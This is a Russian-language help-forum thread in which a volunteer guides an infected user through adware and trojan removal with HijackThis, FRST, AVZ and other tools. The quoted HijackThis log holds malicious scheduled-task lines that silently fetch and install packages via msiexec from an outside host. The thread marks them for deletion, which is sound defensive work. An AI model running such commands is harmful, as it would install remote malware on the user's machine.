Вирусы, процессы в диспетчере задач.

**FatalMouse** · 15.12.2018, 19:08

Появляются неизвестные процессы в диспетчере задач, открываются рекламные сайты в Opera.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 15.12.2018, 19:09

Уважаемый(ая) FatalMouse, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 15.12.2018, 19:50

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки :

Код:

O22 - Task (.job): (Ready) update-S-1-5-21-935787954-3714542951-3318145870-1000.job - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe (file missing) -runmode=checkupdate
O22 - Task (.job): (Ready) update-sys.job - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe (file missing) -runmode=checkupdate
O22 - Task: BlueStacksHelper - C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: RealDownloader Update Check - C:\Program Files (x86)\Real\RealDownloader\downloader2.exe /scheduler (file missing)
O22 - Task: update-S-1-5-21-935787954-3714542951-3318145870-1000 - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (file missing)
O22 - Task: update-sys - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (file missing)
O22 - Task: {03CC4111-A719-8D53-374A-B199C2F384EF} - C:\WINDOWS\system32\msiexec.exe -i https://faremler.com/pxbefdqqwywm.jnh -q
O22 - Task: {2599D2B5-65CD-BA1F-4184-07D3CBD04A89} - C:\WINDOWS\system32\msiexec.exe -package https://faremler.com/g1k0lg5um599.soy /q

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**FatalMouse** · 16.12.2018, 18:35

Выполнил

**Vvvyg** · 16.12.2018, 19:09

Распакуйте fixlist.txt из вложения в папку с Farbar Recovery Scan Tool.
fixlist.7z
Отключите до перезагрузки антивирус, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Упакуйте и прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

**FatalMouse** · 16.12.2018, 20:42

Сделал.

**Vvvyg** · 17.12.2018, 06:44

Проблема решена? Если да, переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

**FatalMouse** · 17.12.2018, 13:54

Процессы из диспетчера задач исчезли, но все равно открывается рекламная страница Asompharr.com в Opera и антивирус после каждой перезагрузки находит Trojan:Win32/Tiggre!rfn, Trojan:Win32/CoinMiner.C!cl, Trojan:Win32/Fuerboos.C!cl

**Vvvyg** · 17.12.2018, 15:19

Сделайте новый лог такой версией Autologger.

**FatalMouse** · 17.12.2018, 19:29

Сделал.

**Vvvyg** · 17.12.2018, 19:51

Выполните скрипт в AVZ:

Код:

begin
 DeleteFile('C:\Users\артем\Favorites\Links\Интернет.url');
 DeleteSchedulerTask('{28F7E8EA-8EEF-BEE4-24A9-5DAFB0DC8F1F}');
ExecuteWizard('SCU',2,2,true);
RebootWindows(false);
end.

Компьютер перезагрузится.

Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
Файл C:\TDSSKiller.***_log.txt приложите в теме? в архиве.
(где *** - версия программы, дата и время запуска.)

**FatalMouse** · 18.12.2018, 09:18

Сделал.

**Vvvyg** · 18.12.2018, 09:51

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

**FatalMouse** · 20.12.2018, 13:24

Программа запускается и на моменте проверки автозапуска зависает. Ждал около получаса и ничего.

**Vvvyg** · 20.12.2018, 13:29

Антивирус отключали?
Попробуйте запускать файл startf.exe (все несистемные процессы, включая браузеры и пр. будут принудительно закрыты!).

**FatalMouse** · 20.12.2018, 13:53

Антивирус отключал.
Сейчас попробую запустить через startf. А какой там надо выбрать пункт в первом окне? "Запустить под текущим пользователем" не вижу.

- - - - -Добавлено - - - - -

Запустил через startf, но все тоже самое.
У меня такая же ситуация была, когда еще не избавились от процессов в диспетчере задач, AVZ просто зависала, пока не снял задачи в диспетчере и перезапустил AVZ.

**Vvvyg** · 20.12.2018, 19:33

Попробуйте в безопасном режиме системы.

**FatalMouse** · 21.12.2018, 14:13

В безопасном режиме тоже самое. После запуска внизу проходит несколько пунктов и на анализе автозапуска программа виснет.

**Vvvyg** · 21.12.2018, 15:10

Сделайте проверку Dr. Web CureIt!

Вирусы, процессы в диспетчере задач. (заявка № 221125)

Опции темы